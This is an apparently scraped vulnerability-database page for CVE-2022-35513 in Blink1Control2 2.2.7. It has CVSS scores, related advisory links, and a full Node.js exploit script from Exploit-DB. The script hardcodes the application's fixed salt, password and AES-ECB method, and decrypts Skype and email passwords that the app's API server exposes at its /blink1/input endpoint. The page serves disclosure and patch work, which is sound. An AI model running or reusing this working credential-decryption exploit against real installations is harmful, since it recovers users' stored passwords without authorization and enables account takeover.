Lucene search
P1ckziEDB-ID:51014HistorySep 20, 2022 - 12:00 a.m.
Blink1Control2 2.2.7 - Weak Password Encryption
2022-09-2000:00:00
p1ckzi
www.exploit-db.com
45
blink1control2
vulnerability
weak encryption
api server
decrypt
cve-2022-35513
ubuntu linux
windows 10
windows 11
CVSS3
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS
0.091
Percentile
94.7%
// Exploit Title: Blink1Control2 2.2.7 - Weak Password Encryption
// Date: 2022-08-12
// Exploit Author: p1ckzi
// Vendor Homepage: https://thingm.com/
// Software Link: https://github.com/todbot/Blink1Control2/releases/tag/v2.2.7
// Vulnerable Version: blink1control2 <= 2.2.7
// Tested on: Ubuntu Linux 20.04, Windows 10, Windows 11.
// CVE: CVE-2022-35513
//
// Description:
// the blink1control2 app (versions <= 2.2.7) utilises an insecure method
// of password storage which can be found by accessing the /blink1/input url
// of the api server.
// password ciphertext for skype logins and email are listed
// and can be decrypted. example usage:
// node blink1-pass-decrypt <ciphertext>
#!/usr/bin/env node
const {ArgumentParser} = require('argparse');
const simpleCrypt = require('simplecrypt');
function exploit() {
const BANNER = '\033[36m\n\
_ _ _ _ _\n\
| |__ | (_)_ __ | | _/ | _ __ __ _ ___ ___\n\
| \'_ \\| | | \'_ \\| |/ | |_____| \'_ \\ / _` / __/ __|_____\n\
| |_) | | | | | | <| |_____| |_) | (_| \\__ \\__ |_____|\n\
|_.__/|_|_|_| |_|_|\\_|_| | .__/ \\__,_|___|___/\n\
|_|\n\
_ _\n\
__| | ___ ___ _ __ _ _ _ __ | |_\n\
/ _` |/ _ \\/ __| \'__| | | | \'_ \\| __|\n\
| (_| | __| (__| | | |_| | |_) | |_\n\
\\__,_|\\___|\\___|_| \\__, | .__/ \\__|\n\
|___/|_|\033[39m';
const PARSER = new ArgumentParser({
description: 'decrypts passwords found at the /blink/input url '
+ 'of the blink1control2 api server (version <= 2.2.7 ).'
});
PARSER.add_argument('ciphertext', {
help: 'encrypted password string to use', type: 'str'
});
let args = PARSER.parse_args();
// supplied ciphertext is decrypted with same salt, password, and method
// used for encryption:
try {
let crypt = simpleCrypt({
salt: 'boopdeeboop',
password: 'blink1control',
method: 'aes-192-ecb'
});
let ciphertext = args.ciphertext;
let decrypted = crypt.decrypt(ciphertext);
console.log(BANNER);
console.log('\033[32m[+] decrypted password:\033[39m');
console.log(decrypted);
}
catch (TypeError) {
console.log('\033[33m[!] the submitted hash was invalid.\033[39m');
}
finally {
process.exit(1);
}
}
exploit()Related
prion
prion
Design/Logic Flaw
2022-09-07 14:15:00
zdt
zdt
Blink1Control2 2.2.7 - Weak Password Encryption Exploit
2022-09-20 00:00:00
github
github
Blink1Control2 uses weak password encryption
2022-09-08 00:00:30
cve
cve
CVE-2022-35513
2022-09-07 14:15:09
veracode
veracode
Weak Encryption
2022-09-08 04:37:34
osv
osv
CVE-2022-35513
2022-09-07 14:15:09
Blink1Control2 uses weak password encryption
2022-09-08 00:00:30
cvelist
cvelist
CVE-2022-35513
2022-09-07 13:54:18
nvd
nvd
CVE-2022-35513
2022-09-07 14:15:09
packetstorm
packetstorm
Blink1Control2 2.2.7 Weak Password Encryption
2022-09-20 00:00:00
CVSS3
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS
0.091
Percentile
94.7%
Related for EDB-ID:51014